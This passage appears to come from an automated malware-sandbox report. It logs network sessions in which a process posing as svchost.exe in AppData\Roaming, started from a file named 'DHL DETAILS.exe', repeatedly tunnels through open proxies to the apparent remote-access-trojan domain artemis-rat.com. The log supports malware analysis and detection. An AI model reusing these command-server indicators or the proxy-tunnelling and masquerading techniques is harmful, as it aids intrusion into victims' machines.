                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2565192.168.2.557039185.49.30.5808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.821439028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2566192.168.2.55832490.188.250.168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.827162981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2567192.168.2.558468192.154.244.92900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.833694935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2568192.168.2.55845823.137.248.197888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.834768057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.645680904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2569192.168.2.55843843.133.70.571567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.841171026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2570192.168.2.558497104.20.75.1328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.845272064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.999327898 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2571192.168.2.558368104.129.205.94543216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.846350908 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.2


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2572192.168.2.557443162.243.102.207976443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.850716114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.270574093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2573192.168.2.55838689.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.854383945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2574192.168.2.558441219.243.212.118844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.854773045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.181751013 CET22INHTTP/1.1 502 ERROR


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2575192.168.2.557464159.65.245.2558043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.856055975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.567519903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.380466938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.281560898 CET442INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache/2.4.18 (Ubuntu)
                                                                                    Content-Length: 281
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2576192.168.2.558463129.213.150.205808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.857831001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2577192.168.2.55725691.134.140.1601221743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.857980967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.380196095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880784035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.815813065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548333883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177493095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2578192.168.2.558035112.30.155.831279243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.859293938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333091974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.020523071 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2579192.168.2.55845413.229.47.1098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.860457897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.185817003 CET223INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:12:01 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Content-Length: 12
                                                                                    X-Kong-Response-Latency: 6.2942504882813e-05
                                                                                    Server: kong/2.8.1
                                                                                    Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                    Data Ascii: Bad request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2580192.168.2.557992117.160.250.133889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.861066103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.612375975 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2581192.168.2.557285183.215.23.242909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.863964081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.275445938 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:48 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2582192.168.2.557402115.96.208.124808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.874562979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.305939913 CET72INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2583192.168.2.55843749.228.131.169500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.876679897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2584192.168.2.555516189.240.60.171909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.885544062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.179922104 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2585192.168.2.558456203.171.19.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.907591105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2586192.168.2.55849952.54.249.2418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.908385038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.124623060 CET66INHTTP/1.1 400 BAD_REQUEST
                                                                                    Content-Length: 0
                                                                                    Connection: Close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2587192.168.2.558462203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.948052883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2588192.168.2.55745386.107.178.102312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.948151112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677242041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2589192.168.2.55844865.1.244.232108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.948152065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.342329979 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2590192.168.2.558555159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.949721098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2591192.168.2.558459103.146.137.5108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.951790094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2592192.168.2.55846446.35.9.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.952003002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2593192.168.2.5585293.12.144.146312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.954788923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.171610117 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2594192.168.2.555659104.236.0.1292216743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.972680092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974193096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.995661974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2595192.168.2.558600104.16.106.2348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.983714104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
